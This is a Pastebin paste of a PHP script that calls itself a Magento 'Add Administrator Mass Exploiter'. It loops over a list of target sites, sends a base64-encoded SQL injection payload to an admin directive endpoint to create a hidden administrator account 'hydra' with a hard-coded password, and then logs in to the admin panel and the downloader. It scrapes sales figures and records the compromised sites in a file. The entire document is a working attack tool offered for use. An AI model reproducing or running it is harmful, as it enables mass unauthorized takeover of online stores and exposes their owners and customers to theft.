SHARE
TWEET

Untitled

a guest Mar 14th, 2019 160 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. $banner = '
  6.   #-----------------------------------------------------------#
  7.   #        Magento Add Administrator Mass Exploiter V.3       #
  8.   #                   Coded By Synchronizer                   #
  9.   #                     Stupidc0de Family                     #
  10.   #                http://facebook.com/annamLRW               #
  11.   #                    www.pringsewudev.org                   #
  12.   #-----------------------------------------------------------#
  13. ';
  14. function bersihkan($htmltags) {
  15.     $htmltags = str_replace('<span class="price">','',$htmltags);
  16.     $htmltags = str_replace('</span>','',$htmltags);
  17.     return $htmltags;
  18.    
  19. }
  20. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  21. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
  22. $postdwn = "username=hydra&password=hydra77";
  23. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  24. $pagelog = "/admin/";
  25. $pagedwn = "/downloader/";
  26.  
  27. function stupid_CURL($url,$data,$page) {
  28. $ch = curl_init();
  29. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  30. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  31. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  33. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  34. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  35. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  36. curl_setopt ($ch, CURLOPT_POST, 1);
  37. $headers  = array();
  38. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  39.  
  40. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  41. curl_setopt ($ch, CURLOPT_HEADER, 1);
  42. $result = curl_exec ($ch);
  43. curl_close($ch);
  44. return $result;
  45. }
  46. print $banner;
  47. $get=file_get_contents($argv[1])
  48. or die("
  49. \n\tError !
  50. \n\tusage => php thisfile.php yourlist.txt\n\n");
  51. $j=explode("\r\n",$get);
  52. foreach($j as $site){
  53.    
  54. print "\n\n\t=> Checking : ".$site;
  55. $hajar = stupid_CURL($site , $postadm, $pageadm);
  56.  
  57. if(preg_match('#200 OK#', $hajar)) {
  58.     $expres = "Success";
  59.     $ceklog = stupid_CURL ($site , $postlog, $pagelog);
  60.    
  61.    
  62. if(preg_match('#302 Moved#', $ceklog)) {
  63.     preg_match_all ('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  64.     foreach($match as $val)
  65.     {
  66.     $ltm = $val[0];
  67.     $avo = $val[1];
  68.     break;
  69.     }
  70.    
  71.     $admlog = "Success";
  72.     $user = "hydra";
  73.     $pass = "hydra77";
  74.     $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  75.     if(preg_match('#Return to Admin#', $cekdwn)) {
  76.        
  77.                 $myfile = fopen("SUCCESS.txt", "a+");
  78. $sukses = " >>>EXPLOIT\r\n\n";
  79. fwrite($myfile, $site);
  80. fwrite($myfile, $sukses);
  81. fclose($myfile);
  82.  
  83.     $dwnlog = "Login Success";
  84. }else {
  85.     $dwnlog = "Login Failed";
  86. }
  87. }else {
  88.     $admlog = "Failed";
  89.     $user = "NULL";
  90.     $pass = "NULL";
  91. }
  92. }else {
  93.     $admlog = "Failed";
  94.     $expres = "Failed";
  95.     $user = "NULL";
  96.     $pass = "NULL";
  97.     $dwnlog = "Login Failed";
  98.     $ltm = "NULL";
  99.     $avo = "NULL";
  100. }
  101. echo '
  102.     +---------------------------------------------+
  103.     +-------Magento Add Admin Exploiter V.3-------+
  104.     +---------------------------------------------+
  105.     | Exploiting    : '.$expres.'
  106.     | Login Admin   : '.$admlog.'
  107.     | Lifetime Sales: '.bersihkan($ltm).'
  108.     | Average Order : '.bersihkan($avo).'
  109.     | Downloader    : '.$dwnlog.'
  110.     | Username  : '.$user.'
  111.     | Password  : '.$pass.'
  112.     +---------------------------------------------+
  113. ';
  114. }
  115. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top